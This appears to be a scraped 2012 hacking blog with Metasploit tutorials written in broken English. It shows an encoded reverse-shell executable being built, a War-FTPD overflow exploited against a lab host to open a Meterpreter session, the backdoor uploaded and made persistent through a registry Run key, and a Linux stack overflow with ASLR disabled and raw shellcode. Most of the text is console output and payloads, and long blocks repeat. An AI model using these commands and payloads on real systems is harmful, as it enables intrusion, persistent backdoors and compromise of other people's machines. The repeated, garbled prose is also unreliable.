Rabu, 29 Februari 2012
Update Beef And Metasploit
Senin, 27 Februari 2012
Auxilary Moduls Using Msf
this module will platform SNMP sweeps against the given range of network address using a well known set of snmp_login string and print the discovered SNMP device information on the screen
root@bt:~# msfconsole 
Social Engineering And Toolkit
Social engineering is also known as a hack man, is an act of social engineering tomanipulate the human mind wants to get a goal. Social engineering is a common term oneveryone's daily life and apply it but the use of social engineering in penetration testing andhacking a bit different. The main use of social engineering in the hacking is to getinformation, to maintain access and so on.
There are a variety of social engineering tips and tricks available on the Internet in additionthere are tips on social engineering toolkit is available to carry out computer-based socialengineering attacks....
Msfencode And Msfpayload
Msfencode
Msfpayload shellcode produced by a fully functional, but it contains some null charactersthat, when interpreted by many programs, signaling the end of the string, and this willcause the code to terminate before completion. In other words.
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > sexy.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
picure is below
Msfpaylaods
Msfpayload is a component of Metasploit to generate shellcode, executable, for use inthe exploitation outside of the Framework. Shellcode can be generated in many formats, including C, Ruby, JavaScript, and even Visual Basic for Applications. Each outputformat would be useful in various situations.
example
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated 14 days ago (2012.01.14)
Warning: This copy of the Metasploit Framework was last updated 14 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
Msfpayload shellcode produced by a fully functional, but it contains some null charactersthat, when interpreted by many programs, signaling the end of the string, and this willcause the code to terminate before completion. In other words.
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > sexy.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
picure is below
Msfpaylaods
Msfpayload is a component of Metasploit to generate shellcode, executable, for use inthe exploitation outside of the Framework. Shellcode can be generated in many formats, including C, Ruby, JavaScript, and even Visual Basic for Applications. Each outputformat would be useful in various situations.
example
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated 14 days ago (2012.01.14)
Warning: This copy of the Metasploit Framework was last updated 14 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use
exploit/windows/ftp/warftpd_165_user
msf exploit(warftpd_165_user) >
search warftp
Matching Modules
================
Name
Disclosure Date Rank Description
----
--------------- ---- -----------
exploit/windows/ftp/warftpd_165_pass
1998-03-19 average War-FTPD 1.65 Password Overflow
exploit/windows/ftp/warftpd_165_user
1998-03-19 average War-FTPD 1.65 Username Overflow
msf exploit(warftpd_165_user) >
show options
Module options
(exploit/windows/ftp/warftpd_165_user):
Name Current Setting
Required Description
---- ---------------
-------- -----------
FTPPASS mozilla@example.com no
The password for the specified username
FTPUSER anonymous no
The username to authenticate as
RHOST yes
The target address
RPORT 21 yes
The target port
msf exploit(warftpd_165_user) > set
RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(warftpd_165_user) >
show options
Module options
(exploit/windows/ftp/warftpd_165_user):
Name Current Setting
Required Description
---- ---------------
-------- -----------
FTPPASS mozilla@example.com no
The password for the specified username
FTPUSER anonymous no
The username to authenticate as
RHOST 192.168.56.101 yes
The target address
RPORT 21 yes
The target port
msf exploit(warftpd_165_user) >
show payloads
Compatible Payloads
===================
Name
Disclosure Date Rank Description
----
--------------- ---- -----------
generic/custom
normal Custom Payload
generic/debug_trap
normal Generic x86 Debug Trap
generic/shell_bind_tcp
normal Generic Command Shell, Bind TCP
Inline
generic/shell_reverse_tcp
normal Generic Command Shell, Reverse
TCP Inline
generic/tight_loop
normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp
normal Reflective Dll Injection, Bind
TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp
normal Reflective Dll Injection, Bind
TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp
normal Reflective Dll Injection, Bind
TCP Stager
windows/dllinject/reverse_http
normal Reflective Dll Injection,
Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http
normal Reflective Dll Injection,
Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp
normal Reflective Dll Injection,
Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp
normal Reflective Dll Injection,
Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp
normal Reflective Dll Injection,
Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp
normal Reflective Dll Injection,
Reverse TCP Stager
windows/dllinject/reverse_tcp_allports
normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns
normal Reflective Dll Injection,
Reverse TCP Stager (DNS)
windows/download_exec
normal Windows Executable Download and
Execute
windows/exec
normal Windows Execute Command
windows/loadlibrary
normal Windows LoadLibrary Path
windows/messagebox
normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager
windows/meterpreter/reverse_http
normal Windows Meterpreter (Reflective
Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https
normal Windows Meterpreter (Reflective
Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http
normal Windows Meterpreter (Reflective Injection), Reverse HTTP
Stager (IPv6)
windows/meterpreter/reverse_ipv6_https
normal Windows Meterpreter (Reflective Injection), Reverse HTTPS
Stager (IPv6)
windows/meterpreter/reverse_ipv6_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports
normal Windows Meterpreter (Reflective Injection), Reverse All-Port
TCP Stager
windows/meterpreter/reverse_tcp_dns
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp
normal Windows Meterpreter Service,
Bind TCP
windows/metsvc_reverse_tcp
normal Windows Meterpreter Service,
Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp
normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp
normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp
normal Windows Inject DLL, Bind TCP
Stager
windows/patchupdllinject/reverse_ipv6_tcp
normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp
normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp
normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or
Win7)
windows/patchupdllinject/reverse_tcp
normal Windows Inject DLL, Reverse TCP
Stager
windows/patchupdllinject/reverse_tcp_allports
normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns
normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp
normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
(IPv6)
windows/patchupmeterpreter/bind_nonx_tcp
normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No
NX or Win7)
windows/patchupmeterpreter/bind_tcp
normal Windows Meterpreter (skape/jt
injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp
normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP
Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports
normal Windows Meterpreter (skape/jt injection), Reverse All-Port
TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(DNS)
windows/shell/bind_ipv6_tcp
normal Windows Command Shell, Bind TCP
Stager (IPv6)
windows/shell/bind_nonx_tcp
normal Windows Command Shell, Bind TCP
Stager (No NX or Win7)
windows/shell/bind_tcp
normal Windows Command Shell, Bind TCP
Stager
windows/shell/reverse_http
normal Windows Command Shell, Reverse
HTTP Stager
windows/shell/reverse_ipv6_http
normal Windows Command Shell, Reverse
HTTP Stager (IPv6)
windows/shell/reverse_ipv6_tcp
normal Windows Command Shell, Reverse
TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp
normal Windows Command Shell, Reverse
TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp
normal Windows Command Shell, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp
normal Windows Command Shell, Reverse
TCP Stager
windows/shell/reverse_tcp_allports
normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell/reverse_tcp_dns
normal Windows Command Shell, Reverse
TCP Stager (DNS)
windows/shell_bind_tcp
normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp
normal Windows Command Shell, Reverse
TCP Inline
windows/speak_pwned
normal Windows Speech API - Say "You
Got Pwned!"
windows/upexec/bind_ipv6_tcp
normal Windows Upload/Execute, Bind TCP
Stager (IPv6)
windows/upexec/bind_nonx_tcp
normal Windows Upload/Execute, Bind TCP
Stager (No NX or Win7)
windows/upexec/bind_tcp
normal Windows Upload/Execute, Bind TCP
Stager
windows/upexec/reverse_http
normal Windows Upload/Execute, Reverse
HTTP Stager
windows/upexec/reverse_ipv6_http
normal Windows Upload/Execute, Reverse
HTTP Stager (IPv6)
windows/upexec/reverse_ipv6_tcp
normal Windows Upload/Execute, Reverse
TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp
normal Windows Upload/Execute, Reverse
TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp
normal Windows Upload/Execute, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp
normal Windows Upload/Execute, Reverse
TCP Stager
windows/upexec/reverse_tcp_allports
normal Windows Upload/Execute, Reverse
All-Port TCP Stager
windows/upexec/reverse_tcp_dns
normal Windows Upload/Execute, Reverse
TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager
windows/vncinject/reverse_http
normal VNC Server (Reflective
Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_http
normal VNC Server (Reflective
Injection), Reverse HTTP Stager (IPv6)
windows/vncinject/reverse_ipv6_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp
normal VNC Server (Reflective
Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports
normal VNC Server (Reflective Injection), Reverse All-Port TCP
Stager
windows/vncinject/reverse_tcp_dns
normal VNC Server (Reflective
Injection), Reverse TCP Stager (DNS)
msf exploit(warftpd_165_user) > set
payload windows/meterpreter/reverse_tcp
payload =>
windows/meterpreter/reverse_tcp
msf exploit(warftpd_165_user) >
show options
Module options
(exploit/windows/ftp/warftpd_165_user):
Name Current Setting
Required Description
---- ---------------
-------- -----------
FTPPASS mozilla@example.com no
The password for the specified username
FTPUSER anonymous no
The username to authenticate as
RHOST 192.168.56.101 yes
The target address
RPORT 21 yes
The target port
Payload options
(windows/meterpreter/reverse_tcp):
Name Current Setting Required
Description
---- --------------- --------
-----------
EXITFUNC process yes
Exit technique: seh, thread, process, none
LHOST yes
The listen address
LPORT 4444 yes
The listen port
msf exploit(warftpd_165_user) > set
LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(warftpd_165_user) >
show options
Module options
(exploit/windows/ftp/warftpd_165_user):
Name Current Setting
Required Description
---- ---------------
-------- -----------
FTPPASS mozilla@example.com no
The password for the specified username
FTPUSER anonymous no
The username to authenticate as
RHOST 192.168.56.101 yes
The target address
RPORT 21 yes
The target port
Payload options
(windows/meterpreter/reverse_tcp):
Name Current Setting Required
Description
---- --------------- --------
-----------
EXITFUNC process yes
Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes
The listen address
LPORT 4444 yes
The listen port
msf exploit(warftpd_165_user) >
show targets
Exploit targets:
Id Name
-- ----
0 Windows 2000 SP0-SP4 English
1 Windows XP SP0-SP1 English
2 Windows XP SP2 English
3 Windows XP SP3 English
msf exploit(warftpd_165_user) > set
targets 3
targets => 3
msf exploit(warftpd_165_user) >
show options
Module options
(exploit/windows/ftp/warftpd_165_user):
Name Current Setting
Required Description
---- ---------------
-------- -----------
FTPPASS mozilla@example.com no
The password for the specified username
FTPUSER anonymous no
The username to authenticate as
RHOST 192.168.56.101 yes
The target address
RPORT 21 yes
The target port
Payload options
(windows/meterpreter/reverse_tcp):
Name Current Setting Required
Description
---- --------------- --------
-----------
EXITFUNC process yes
Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes
The listen address
LPORT 4444 yes
The listen port
msf exploit(warftpd_165_user) >
show options
Module options
(exploit/windows/ftp/warftpd_165_user):
Name Current Setting
Required Description
---- ---------------
-------- -----------
FTPPASS mozilla@example.com no
The password for the specified username
FTPUSER anonymous no
The username to authenticate as
RHOST 192.168.56.101 yes
The target address
RPORT 21 yes
The target port
Payload options
(windows/meterpreter/reverse_tcp):
Name Current Setting Required
Description
---- --------------- --------
-----------
EXITFUNC process yes
Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes
The listen address
LPORT 4444 yes
The listen port
msf exploit(warftpd_165_user) >
exploit
[-] Exploit failed: A target has not
been selected.
msf exploit(warftpd_165_user) > set
target 3
target => 3
msf exploit(warftpd_165_user) >
show options
Module options
(exploit/windows/ftp/warftpd_165_user):
Name Current Setting
Required Description
---- ---------------
-------- -----------
FTPPASS mozilla@example.com no
The password for the specified username
FTPUSER anonymous no
The username to authenticate as
RHOST 192.168.56.101 yes
The target address
RPORT 21 yes
The target port
Payload options
(windows/meterpreter/reverse_tcp):
Name Current Setting Required
Description
---- --------------- --------
-----------
EXITFUNC process yes
Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes
The listen address
LPORT 4444 yes
The listen port
Exploit target:
Id Name
-- ----
3 Windows XP SP3 English
msf exploit(warftpd_165_user) >
exploit
[*] Started reverse handler on
192.168.56.1:4444
[-] Exploit exception: The connection
was refused by the remote host (192.168.56.101:21).
[*] Exploit completed, but no session
was created.
msf exploit(warftpd_165_user) >
exploit
[*] Started reverse handler on
192.168.56.1:4444
[*] Trying target Windows XP SP3
English...
[*] Sending stage (752128 bytes) to
192.168.56.101
[*] Meterpreter session 1 opened
(192.168.56.1:4444 -> 192.168.56.101:1050) at 2012-02-27 20:27:04
+0700
meterpreter > ps
Process list
============
PID Name Arch Session
User Path
--- ---- ---- -------
---- ----
0 [System Process]
1040 svchost.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1104 svchost.exe x86 0
C:\WINDOWS\system32\svchost.exe
1156 svchost.exe x86 0
C:\WINDOWS\system32\svchost.exe
1496 spoolsv.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1600 svchost.exe x86 0
WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\svchost.exe
1660 explorer.exe x86 0
WEKO-9B92FC1EF0\weko C:\WINDOWS\Explorer.EXE
1712 alg.exe x86 0
C:\WINDOWS\System32\alg.exe
1808 VBoxTray.exe x86 0
WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\VBoxTray.exe
1816 GrooveMonitor.exe x86 0
WEKO-9B92FC1EF0\weko C:\Program Files\Microsoft
Office\Office12\GrooveMonitor.exe
1828 ctfmon.exe x86 0
WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\ctfmon.exe
1984 svchost.exe x86 0
WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\svchost.exe
2136 wscntfy.exe x86 0
WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wscntfy.exe
3120 wuauclt.exe x86 0
WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wuauclt.exe
3464 wpabaln.exe x86 0
WEKO-9B92FC1EF0\weko C:\WINDOWS\system32\wpabaln.exe
4 System x86 0
4064 war-ftpd.exe x86 0
WEKO-9B92FC1EF0\weko C:\Documents and Settings\weko\My
Documents\instaler\war-ftpd.exe
444 AntDS.exe x86 0
NT AUTHORITY\SYSTEM C:\Program
Files\BigAntSoft\AntServer\AntDS.exe
464 AntServer.exe x86 0
NT AUTHORITY\SYSTEM C:\Program
Files\BigAntSoft\AntServer\AntServer.exe
488 AvServer.exe x86 0
NT AUTHORITY\SYSTEM C:\Program
Files\BigAntSoft\AntServer\AvServer.exe
520 smss.exe x86 0
NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
584 csrss.exe x86 0
NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
608 winlogon.exe x86 0
NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
828 VBoxService.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
872 svchost.exe x86 0
NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
948 svchost.exe x86 0
C:\WINDOWS\system32\svchost.exe
meterpreter > ?
Core Commands
=============
Command
Description
-------
-----------
? Help menu
background
Backgrounds the current session
bgkill Kills a
background meterpreter script
bglist Lists
running background scripts
bgrun Executes
a meterpreter script as a background thread
channel Displays
information about active channels
close Closes a
channel
detach Detach
the meterpreter session (for http/https)
disable_unicode_encoding Disables
encoding of unicode strings
enable_unicode_encoding Enables
encoding of unicode strings
exit Terminate
the meterpreter session
help Help menu
info Displays
information about a Post module
interact Interacts
with a channel
irb Drop into
irb scripting mode
load Load one
or more meterpreter extensions
migrate Migrate
the server to another process
quit Terminate
the meterpreter session
read Reads
data from a channel
resource Run the
commands stored in a file
run Executes
a meterpreter script or Post module
use
Deprecated alias for 'load'
write Writes
data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of
a file to the screen
cd Change directory
del Delete the specified
file
download Download a file or
directory
edit Edit a file
getlwd Print local working
directory
getwd Print working
directory
lcd Change local working
directory
lpwd Print local working
directory
ls List files
mkdir Make directory
pwd Print working
directory
rm Delete the specified
file
rmdir Remove directory
search Search for files
upload Upload a file or
directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port
to a remote service
route View and modify the
routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any
active impersonation token.
execute Execute a command
getpid Get the current
process identifier
getprivs Attempt to enable all
privileges available to the current process
getuid Get the user that the
server is running as
kill Terminate a process
ps List running
processes
reboot Reboots the remote
computer
reg Modify and interact
with the remote registry
rev2self Calls RevertToSelf()
on the remote machine
shell Drop into a system
command shell
shutdown Shuts down the remote
computer
steal_token Attempts to steal an
impersonation token from the target process
sysinfo Gets information
about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible
desktops and window stations
getdesktop Get the current
meterpreter desktop
idletime Returns the number
of seconds the remote user has been idle
keyscan_dump Dump the keystroke
buffer
keyscan_start Start capturing
keystrokes
keyscan_stop Stop capturing
keystrokes
screenshot Grab a screenshot of
the interactive desktop
setdesktop Change the
meterpreters current desktop
uictl Control some of the
user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the
default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from
the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate
your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of
the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE
attributes
meterpreter > help
Core Commands
=============
Command
Description
-------
-----------
? Help menu
background
Backgrounds the current session
bgkill Kills a
background meterpreter script
bglist Lists
running background scripts
bgrun Executes
a meterpreter script as a background thread
channel Displays
information about active channels
close Closes a
channel
detach Detach
the meterpreter session (for http/https)
disable_unicode_encoding Disables
encoding of unicode strings
enable_unicode_encoding Enables
encoding of unicode strings
exit Terminate
the meterpreter session
help Help menu
info Displays
information about a Post module
interact Interacts
with a channel
irb Drop into
irb scripting mode
load Load one
or more meterpreter extensions
migrate Migrate
the server to another process
quit Terminate
the meterpreter session
read Reads
data from a channel
resource Run the
commands stored in a file
run Executes
a meterpreter script or Post module
use
Deprecated alias for 'load'
write Writes
data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of
a file to the screen
cd Change directory
del Delete the specified
file
download Download a file or
directory
edit Edit a file
getlwd Print local working
directory
getwd Print working
directory
lcd Change local working
directory
lpwd Print local working
directory
ls List files
mkdir Make directory
pwd Print working
directory
rm Delete the specified
file
rmdir Remove directory
search Search for files
upload Upload a file or
directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port
to a remote service
route View and modify the
routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any
active impersonation token.
execute Execute a command
getpid Get the current
process identifier
getprivs Attempt to enable all
privileges available to the current process
getuid Get the user that the
server is running as
kill Terminate a process
ps List running
processes
reboot Reboots the remote
computer
reg Modify and interact
with the remote registry
rev2self Calls RevertToSelf()
on the remote machine
shell Drop into a system
command shell
shutdown Shuts down the remote
computer
steal_token Attempts to steal an
impersonation token from the target process
sysinfo Gets information
about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible
desktops and window stations
getdesktop Get the current
meterpreter desktop
idletime Returns the number
of seconds the remote user has been idle
keyscan_dump Dump the keystroke
buffer
keyscan_start Start capturing
keystrokes
keyscan_stop Stop capturing
keystrokes
screenshot Grab a screenshot of
the interactive desktop
setdesktop Change the
meterpreters current desktop
uictl Control some of the
user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the
default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from
the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate
your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of
the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE
attributes
meterpreter > upload /root/sexy.exe
c:\\windows\\system32
[*] uploading : /root/sexy.exe ->
c:\windows\system32
[*] uploaded : /root/sexy.exe ->
c:\windows\system32\sexy.exe
meterpreter > execute -f sexy.exe
Process 3372 created.
meterpreter > execute -f sexy.exe
Process 2816 created.
meterpreter > reg setval -k
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d
'c:\\windows\
Successful set start.
meterpreter > reg queryval -k
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d
'c:\\window
Key:
HKLM\Software\Microsoft\Windows\CurrentVersion\run
Name: start
Type: REG_SZ
Data: c:\\windows\\system32\\sexy.exe
meterpreter > reboot
Rebooting...
meterpreter >
Jumat, 24 Februari 2012
Exploitation Linux In BT 5 r1
Exploit linux
before we start we should pray that facilitated the exploitation of linux
hehehehehe….
:)
we start from the beginning of the story of exploitation linux and go directly to the TKP!
hehehehe ...
:)
Okay we first open a terminal and run the following command
root@bt:~# cat /proc/sys/kernel/randomize_va_space
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space
And shown in the picture below
Then we create a file with extension C that uses the language C + + and it looks like the picture below
The next compile the script to trigger a buffer overflow
Next we use a protection technique called "stack-smashing protection" and is used to detect buffer overflow the stack before the malicious code is executed.
We can change the SSP off by adding "-fno-stack-protector" flag to gcc when compiling.
then we send a character as much as 505 but still not teroverwrite then we send as much as 508 characters we can see EIP in it is 0x41414141 as shown in the picture below
then we can see if the value of EBP and EIP has overwritted. Next, we examine a specific register ESP as shown below
Then we try to find out the address of the ESP and reduce the 200 bytes of it.
The next, we subtract 200 from ESP. ESP is in bffff16c address, then we will get the result: 0xbffff16c - 200 = 0xbfffef6c to calculate these values we can use the application Kcalc
The next and generate shellcode.
run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\xa4\xf0\xff\xbf" * 35')
Exploitation succes....
:)
before we start we should pray that facilitated the exploitation of linux
hehehehehe….
:)
we start from the beginning of the story of exploitation linux and go directly to the TKP!
hehehehe ...
:)
Okay we first open a terminal and run the following command
root@bt:~# cat /proc/sys/kernel/randomize_va_space
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space
And shown in the picture below
We can change the SSP off by adding "-fno-stack-protector" flag to gcc when compiling.
then we send a character as much as 505 but still not teroverwrite then we send as much as 508 characters we can see EIP in it is 0x41414141 as shown in the picture below
The next, we subtract 200 from ESP. ESP is in bffff16c address, then we will get the result: 0xbffff16c - 200 = 0xbfffef6c to calculate these values we can use the application Kcalc
run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\xa4\xf0\xff\xbf" * 35')
:)
Rabu, 22 Februari 2012
SEH and SafeSEH - EXPLOIT File Sharing Wizard
open your Applications File Sharing Wizard
after the start and then open the application and select Ollydbg then attack file sharing wizard
menu view -excuttable modules after that will come out look like below and then we will use LYBEAY32.dll
namely the affset 77FE2346
and after that open OllyDbg and BigAnt application, then do the same again as beforefuzzer. after that click open the SEH chain and can press Shift + F9
as then start EIP value that we can be like the picture below
Still have not managed to be continued
Langganan:
Postingan (Atom)